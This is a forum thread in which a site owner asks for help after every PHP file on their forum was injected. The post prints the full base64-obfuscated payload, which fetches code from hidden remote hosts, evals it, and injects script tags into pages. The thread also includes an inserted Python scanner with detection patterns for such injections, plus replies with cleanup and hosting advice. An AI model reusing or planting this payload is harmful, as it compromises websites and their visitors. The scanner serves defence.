My forum was hacked - please help!


michelle86
09-28-2012, 07:16 PM
My forum has been hacked. All the php files have been changed.


All of the php files for my site have this code added to the very top:

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZX QoJF9TRVJWRVJbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9u byddPTE7ICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJy kpeyAgICBmdW5jdGlvbiBnZXRfdGRzXzc3NygkdXJsKXskY29u dGVudD0iIjskY29udGVudD1AdHJ5Y3VybF83NzcoJHVybCk7aW YoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNv bnRlbnQ9QHRyeWZpbGVfNzc3KCR1cmwpO2lmKCRjb250ZW50IT 09ZmFsc2UpcmV0dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlm b3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZX R1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZzb2Nrb3Blbl83 NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJG NvbnRlbnQ7JGNvbnRlbnQ9QHRyeXNvY2tldF83NzcoJHVybCk7 aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cm V0dXJuICcnO30gIGZ1bmN0aW9uIHRyeWN1cmxfNzc3KCR1cmwp e2lmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0Jyk9PT1mYW xzZSlyZXR1cm4gZmFsc2U7JGNoID0gY3VybF9pbml0ICgpO2N1 cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLCR1cmwpO2N1cm xfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIs IDEpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVC wgNSk7Y3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9IRUFERVIs IDApOyRyZXN1bHQgPSBjdXJsX2V4ZWMgKCRjaCk7Y3VybF9jbG 9zZSgkY2gpO2lmICgkcmVzdWx0PT0iIilyZXR1cm4gZmFsc2U7 cmV0dXJuICRyZXN1bHQ7fSAgZnVuY3Rpb24gdHJ5ZmlsZV83Nz coJHVybCl7aWYoZnVuY3Rpb25fZXhpc3RzKCdmaWxlJyk9PT1m YWxzZSlyZXR1cm4gZmFsc2U7JGluYz1AZmlsZSgkdXJsKTskYn VmPUBpbXBsb2RlKCcnLCRpbmMpO2lmICgkYnVmPT0iIilyZXR1 cm4gZmFsc2U7cmV0dXJuICRidWY7fSAgZnVuY3Rpb24gdHJ5Zm 9wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnZm9w ZW4nKT09PWZhbHNlKXJldHVybiBmYWxzZTskYnVmPScnOyRmPU Bmb3BlbigkdXJsLCdyJyk7aWYgKCRmKXt3aGlsZSghZmVvZigk ZikpeyRidWYuPWZyZWFkKCRmLDEwMDAwKTt9ZmNsb3NlKCRmKT t9ZWxzZSByZXR1cm4gZmFsc2U7aWYgKCRidWY9PSIiKXJldHVy biBmYWxzZTtyZXR1cm4gJGJ1Zjt9ICBmdW5jdGlvbiB0cnlmc2 9ja29wZW5fNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygn ZnNvY2tvcGVuJyk9PT1mYWxzZSlyZXR1cm4gZmFsc2U7JHA9QH BhcnNlX3VybCgkdXJsKTskaG9zdD0kcFsnaG9zdCddOyR1cmk9 JHBbJ3BhdGgnXS4nPycuJHBbJ3F1ZXJ5J107JGY9QGZzb2Nrb3 BlbigkaG9zdCw4MCwkZXJybm8sICRlcnJzdHIsMzApO2lmKCEk 
ZilyZXR1cm4gZmFsc2U7JHJlcXVlc3QgPSJHRVQgJHVyaSBIVF RQLzEuMFxuIjskcmVxdWVzdC49Ikhvc3Q6ICRob3N0XG5cbiI7 ZndyaXRlKCRmLCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCFmZW 9mKCRmKSl7JGJ1Zi49ZnJlYWQoJGYsMTAwMDApO31mY2xvc2Uo JGYpO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bGlzdCgkbS wkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5jaHIoMTMp LmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZnVuY3Rpb2 4gdHJ5c29ja2V0Xzc3NygkdXJsKXtpZihmdW5jdGlvbl9leGlz dHMoJ3NvY2tldF9jcmVhdGUnKT09PWZhbHNlKXJldHVybiBmYW xzZTskcD1AcGFyc2VfdXJsKCR1cmwpOyRob3N0PSRwWydob3N0 J107JHVyaT0kcFsncGF0aCddLic/Jy4kcFsncXVlcnknXTskaXAxPUBnZXRob3N0YnluYW1lKCRob3 N0KTskaXAyPUBsb25nMmlwKEBpcDJsb25nKCRpcDEpKTsgaWYg KCRpcDEhPSRpcDIpcmV0dXJuIGZhbHNlOyRzb2NrPUBzb2NrZX RfY3JlYXRlKEFGX0lORVQsU09DS19TVFJFQU0sU09MX1RDUCk7 aWYgKCFAc29ja2V0X2Nvbm5lY3QoJHNvY2ssJGlwMSw4MCkpe0 Bzb2NrZXRfY2xvc2UoJHNvY2spO3JldHVybiBmYWxzZTt9JHJl cXVlc3QgPSJHRVQgJHVyaSBIVFRQLzEuMFxuIjskcmVxdWVzdC 49Ikhvc3Q6ICRob3N0XG5cbiI7c29ja2V0X3dyaXRlKCRzb2Nr LCRyZXF1ZXN0KTskYnVmPScnO3doaWxlKCR0PXNvY2tldF9yZW FkKCRzb2NrLDEwMDAwKSl7JGJ1Zi49JHQ7fUBzb2NrZXRfY2xv c2UoJHNvY2spO2lmICgkYnVmPT0iIilyZXR1cm4gZmFsc2U7bG lzdCgkbSwkYnVmKT1leHBsb2RlKGNocigxMykuY2hyKDEwKS5j aHIoMTMpLmNocigxMCksJGJ1Zik7cmV0dXJuICRidWY7fSAgZn VuY3Rpb24gdXBkYXRlX3Rkc19maWxlXzc3NygkdGRzZmlsZSl7 JGFjdHVhbDE9JF9TRVJWRVJbJ3NfYTEnXTskYWN0dWFsMj0kX1 NFUlZFUlsnc19hMiddOyR2YWw9Z2V0X3Rkc183NzcoJGFjdHVh bDEpO2lmICgkdmFsPT0iIikkdmFsPWdldF90ZHNfNzc3KCRhY3 R1YWwyKTskZj1AZm9wZW4oJHRkc2ZpbGUsInciKTtpZiAoJGYp e0Bmd3JpdGUoJGYsJHZhbCk7QGZjbG9zZSgkZik7fWlmIChzdH JzdHIoJHZhbCwifHx8Q09ERXx8fCIpKXtsaXN0KCR2YWwsJGNv ZGUpPWV4cGxvZGUoInx8fENPREV8fHwiLCR2YWwpO2V2YWwoYm FzZTY0X2RlY29kZSgkY29kZSkpO31yZXR1cm4gJHZhbDt9ICBm dW5jdGlvbiBnZXRfYWN0dWFsX3Rkc183NzcoKXskZGVmYXVsdG RvbWFpbj0kX1NFUlZFUlsnc19kMSddOyRkaXI9JF9TRVJWRVJb J3NfcDEnXTskdGRzZmlsZT0kZGlyLiJsb2cxLnR4dCI7aWYgKE BmaWxlX2V4aXN0cygkdGRzZmlsZSkpeyRtdGltZT1AZmlsZW10 aW1lKCR0ZHNmaWxlKTskY3RpbWU9dGltZSgpLSRtdGltZTtpZi AoJGN0aW1lPiRfU0VSVkVSWydzX3QxJ10peyRjb250ZW50PXVw 
ZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2ZpbGUpO31lbHNleyRjb2 50ZW50PUBmaWxlX2dldF9jb250ZW50cygkdGRzZmlsZSk7fX1l bHNleyRjb250ZW50PXVwZGF0ZV90ZHNfZmlsZV83NzcoJHRkc2 ZpbGUpO30kdGRzPUBleHBsb2RlKCJcbiIsJGNvbnRlbnQpOyRj PUBjb3VudCgkdGRzKSswOyR1cmw9JGRlZmF1bHRkb21haW47aW YgKCRjPjEpeyR1cmw9dHJpbSgkdGRzW210X3JhbmQoMCwkYy0y KV0pO31yZXR1cm4gJHVybDt9ICBmdW5jdGlvbiBpc19tYWNfNz c3KCR1YSl7JG1hYz0wO2lmIChzdHJpc3RyKCR1YSwibWFjIil8 fHN0cmlzdHIoJHVhLCJzYWZhcmkiKSlpZiAoKCFzdHJpc3RyKC R1YSwid2luZG93cyIpKSYmKCFzdHJpc3RyKCR1YSwiaXBob25l IikpKSRtYWM9MTtyZXR1cm4gJG1hYzt9ICBmdW5jdGlvbiBpc1 9tc2llXzc3NygkdWEpeyRtc2llPTA7aWYgKHN0cmlzdHIoJHVh LCJNU0lFIDYiKXx8c3RyaXN0cigkdWEsIk1TSUUgNyIpfHxzdH Jpc3RyKCR1YSwiTVNJRSA4Iil8fHN0cmlzdHIoJHVhLCJNU0lF IDkiKSkkbXNpZT0xO3JldHVybiAkbXNpZTt9ICAgIGZ1bmN0aW 9uIHNldHVwX2dsb2JhbHNfNzc3KCl7JHJ6PSRfU0VSVkVSWyJE T0NVTUVOVF9ST09UIl0uIi8ubG9ncy8iOyRtej0iL3RtcC8iO2 lmICghQGlzX2RpcigkcnopKXtAbWtkaXIoJHJ6KTtpZiAoQGlz X2RpcigkcnopKXskbXo9JHJ6O31lbHNleyRyej0kX1NFUlZFUl siU0NSSVBUX0ZJTEVOQU1FIl0uIi8ubG9ncy8iO2lmICghQGlz X2RpcigkcnopKXtAbWtkaXIoJHJ6KTtpZiAoQGlzX2Rpcigkcn opKXskbXo9JHJ6O319ZWxzZXskbXo9JHJ6O319fWVsc2V7JG16 PSRyejt9JGJvdD0wOyR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0 FHRU5UJ107aWYgKHN0cmlzdHIoJHVhLCJtc25ib3QiKXx8c3Ry aXN0cigkdWEsIllhaG9vIikpJGJvdD0xO2lmIChzdHJpc3RyKC R1YSwiYmluZ2JvdCIpfHxzdHJpc3RyKCR1YSwiZ29vZ2xlIikp JGJvdD0xOyRtc2llPTA7aWYgKGlzX21zaWVfNzc3KCR1YSkpJG 1zaWU9MTskbWFjPTA7aWYgKGlzX21hY183NzcoJHVhKSkkbWFj PTE7aWYgKCgkbXNpZT09MCkmJigkbWFjPT0wKSkkYm90PTE7IC BnbG9iYWwgJF9TRVJWRVI7ICAgICRfU0VSVkVSWydzX3AxJ109 JG16OyAgJF9TRVJWRVJbJ3NfYjEnXT0kYm90OyAgJF9TRVJWRV JbJ3NfdDEnXT0xMjAwOyAgJF9TRVJWRVJbJ3NfZDEnXT1iYXNl NjRfZGVjb2RlKCdhSFIwY0RvdkwyVnVjekV5TW5wNmVtUmtZWH A2TG1OdmJTOD0nKTsgICRkPSc/ZD0nLnVybGVuY29kZSgkX1NFUlZFUlsiSFRUUF9IT1NUIl0pLi ImcD0iLnVybGVuY29kZSgkX1NFUlZFUlsiUEhQX1NFTEYiXSku IiZhPSIudXJsZW5jb2RlKCRfU0VSVkVSWyJIVFRQX1VTRVJfQU dFTlQiXSk7ICAkX1NFUlZFUlsnc19hMSddPWJhc2U2NF9kZWNv ZGUoJ2FIUjBjRG92TDJOdmIzQmxjbXB6ZFhSbU9DNXlkUzluWD 
J4dllXUXVjR2h3JykuJGQ7ICAkX1NFUlZFUlsnc19hMiddPWJh c2U2NF9kZWNvZGUoJ2FIUjBjRG92TDI1c2FXNTBhR1YzYjI5a0 xtTnZiUzluWDJ4dllXUXVjR2h3JykuJGQ7ICAkX1NFUlZFUlsn c19zY3JpcHQnXT0ibmwucGhwP3A9ZCI7ICB9ICAgICAgc2V0dX BfZ2xvYmFsc183NzcoKTsgICAgaWYoIWZ1bmN0aW9uX2V4aXN0 cygnZ21sXzc3NycpKXsgIGZ1bmN0aW9uIGdtbF83NzcoKXsgIC AgJHJfc3RyaW5nXzc3Nz0nJzsgIGlmICgkX1NFUlZFUlsnc19i MSddPT0wKSRyX3N0cmluZ183Nzc9JzxzY3JpcHQgc3JjPSInLm dldF9hY3R1YWxfdGRzXzc3NygpLiRfU0VSVkVSWydzX3Njcmlw dCddLiciPjwvc2NyaXB0Pic7ICByZXR1cm4gJHJfc3RyaW5nXz c3NzsgIH0gIH0gICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdn emRlY29kZWl0JykpeyAgZnVuY3Rpb24gZ3pkZWNvZGVpdCgkZG Vjb2RlKXsgICR0PUBvcmQoQHN1YnN0cigkZGVjb2RlLDMsMSkp OyAgJHN0YXJ0PTEwOyAgJHY9MDsgIGlmKCR0JjQpeyAgJHN0cj 1AdW5wYWNrKCd2JyxzdWJzdHIoJGRlY29kZSwxMCwyKSk7ICAk c3RyPSRzdHJbMV07ICAkc3RhcnQrPTIrJHN0cjsgIH0gIGlmKC R0JjgpeyAgJHN0YXJ0PUBzdHJwb3MoJGRlY29kZSxjaHIoMCks JHN0YXJ0KSsxOyAgfSAgaWYoJHQmMTYpeyAgJHN0YXJ0PUBzdH Jwb3MoJGRlY29kZSxjaHIoMCksJHN0YXJ0KSsxOyAgfSAgaWYo JHQmMil7ICAkc3RhcnQrPTI7ICB9ICAkcmV0PUBnemluZmxhdG UoQHN1YnN0cigkZGVjb2RlLCRzdGFydCkpOyAgaWYoJHJldD09 PUZBTFNFKXsgICRyZXQ9JGRlY29kZTsgIH0gIHJldHVybiAkcm V0OyAgfSAgfSAgZnVuY3Rpb24gbXJvYmgoJGNvbnRlbnQpeyAg QEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgJG RlY29kZWRfY29udGVudD1nemRlY29kZWl0KCRjb250ZW50KTsg IGlmKHByZWdfbWF0Y2goJy9cPFwvYm9keS9zaScsJGRlY29kZW RfY29udGVudCkpeyAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhc PFwvYm9keVteXD5dKlw+KS9zaScsZ21sXzc3NygpLiJcbiIuJy QxJywkZGVjb2RlZF9jb250ZW50KTsgIH1lbHNleyAgcmV0dXJu ICRkZWNvZGVkX2NvbnRlbnQuZ21sXzc3NygpOyAgfSAgfSAgb2 Jfc3RhcnQoJ21yb2JoJyk7ICB9ICB9"));?>

I need help and advice. I am in the process of removing the code. I've reuploaded all the files, but am going through and having to manually edit files of add-ons and stuff.

Basically this php code wiped out everything but the first few inches of a page. Everything below that was gone. Searches were not functional, etc. It's a big mess.
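The injection described in this post (an `eval(base64_decode("..."))` line prepended to every PHP file, plus a `.logs` directory holding a `logs1.txt` list of URLs) is the kind of thing a site owner has to find across a whole web root before re-uploading clean files. The scanner below is an added example written for this thread, not code from the original poster, vBulletin, or any add-on. It walks a directory, flags `.php` files whose head carries an `eval(base64_decode())` literal, decodes the literal without executing it, and lists indicator strings found in the decoded text. Function names, the indicator list and the sample payload are my own; the sample payload is a constructed inert string, not the blob from the post. Two details the thread motivates: the base64 literal must be read whole (the posted one runs to many kilobytes, so the scan window must be large enough to hold it), and stray whitespace inside the literal, as produced by forum wrapping or editors, has to be stripped before decoding.

```python
import base64
import binascii
import re
import tempfile
from pathlib import Path

# Injection shape seen in the thread: eval() of a base64_decode() string literal.
# Whitespace is allowed inside the literal because wrapping often inserts it.
INJECTION_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*["']([A-Za-z0-9+/=\s]+)["']\s*\)\s*\)""",
    re.IGNORECASE,
)

# Strings in a decoded payload that deserve a closer look. Two of them (.logs/ and
# logs1.txt) are the artifacts the thread reports; the rest are generic dropper traits.
INDICATORS = (
    "ob_start", "curl_init", "fsockopen", "base64_decode", "eval(",
    "<script", ".logs/", "logs1.txt", "HTTP_USER_AGENT", "preg_replace",
)


def decode_payload(b64):
    """Decode the base64 literal for inspection only (never eval it). None if not valid base64."""
    cleaned = re.sub(r"\s+", "", b64)
    try:
        raw = base64.b64decode(cleaned, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def scan_file(path, head_bytes=65536):
    """Return a finding dict if the file head carries the injection, else None.

    The whole literal must fit inside head_bytes; injected headers of this family
    are often 10 KiB or more, so a small window would silently miss them.
    """
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        head = fh.read(head_bytes)
    m = INJECTION_RE.search(head)
    if not m:
        return None
    decoded = decode_payload(m.group(1))
    hits = [] if decoded is None else [s for s in INDICATORS if s.lower() in decoded.lower()]
    return {
        "path": str(path),
        "offset": m.start(),          # where in the file the eval() begins
        "decoded_ok": decoded is not None,
        "indicators": hits,
        "decoded": decoded,
    }


def scan_tree(root):
    """Walk a web root and return findings for every .php file carrying the injection."""
    findings = []
    for p in sorted(Path(root).rglob("*.php")):
        f = scan_file(p)
        if f:
            findings.append(f)
    return findings


# Constructed, inert sample payload (hypothetical; not the blob from the thread).
SAMPLE_PAYLOAD = (
    "if(function_exists('ob_start')){ $dir=$_SERVER['DOCUMENT_ROOT'].'/.logs/'; "
    "$list=$dir.'logs1.txt'; /* constructed placeholder, does nothing */ }"
)


def build_sample_tree(root):
    """Write a constructed web root: one clean file and one injected file with wrapped base64."""
    root = Path(root)
    (root / "includes").mkdir(parents=True, exist_ok=True)
    (root / "includes" / "config.php").write_text("<?php\n$db_host = 'localhost';\n")
    b64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
    # 40-char chunks separated by spaces, mimicking the wrapped paste in the thread.
    wrapped = " ".join(b64[i:i + 40] for i in range(0, len(b64), 40))
    (root / "index.php").write_text(
        f'<?php /**/ eval(base64_decode("{wrapped}"));?>\n<?php\necho "hello";\n'
    )
    return root


def run_demo():
    """Build the sample tree in a temp dir and return (findings, result for the clean file)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(tmp)
        return scan_tree(root), scan_file(root / "includes" / "config.php")


if __name__ == "__main__":
    findings, _ = run_demo()
    for f in findings:
        print(f"{f['path']}: eval(base64_decode()) at byte {f['offset']}, indicators={f['indicators']}")
```

Point `scan_tree()` at a copy of the web root taken before re-uploading clean files; the `decoded` text of each finding is what tells you which hosts the payload talks to and which files (such as the `.logs` directory here) it writes, which is the evidence worth keeping before deleting anything.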

ForceHSS
09-28-2012, 07:23 PM
Check logs, see how they got in, and change all passwords.

michelle86
09-28-2012, 07:24 PM
I've contacted my host (bluehost) and they said there is no way for them to see the history of who has logged into my bluehost account.

Is there any other way I can check?

CAG CheechDogg
09-28-2012, 07:33 PM
I have dealt with bluehost in the past and they are just not someone I trust at all. You might want to think about switching to another hosting solution.

With enough persistence from me and a few questions that I asked them, I was able to get them to give me access to an account of mine that I had no idea what the credentials were. They should have never given me access or changed any information for me to access that account, because "I" was not able to verify who I was, yet I still got what I wanted.

michelle86
09-28-2012, 07:39 PM
Just saw a .logs file. In it was a logs1.txt file with a bunch of weird urls listed in it.

I deleted it.


Found and removed all the code. Everything is working now (I hope anyway). Still can't figure out how someone got in or where they got in.

If anyone has any advice or has any ideas, please let me know.

ForceHSS
09-28-2012, 08:09 PM
Every host keeps logs; if they say they don't, they are lying.

CAG CheechDogg
09-28-2012, 08:22 PM
> Every host keeps logs; if they say they don't, they are lying.

Exactly ForceHSS, I had very bad experiences with those guys.

michelle86, do yourself a favor and switch to another host to save yourself future headaches.

I use HostGator michelle86, check them out.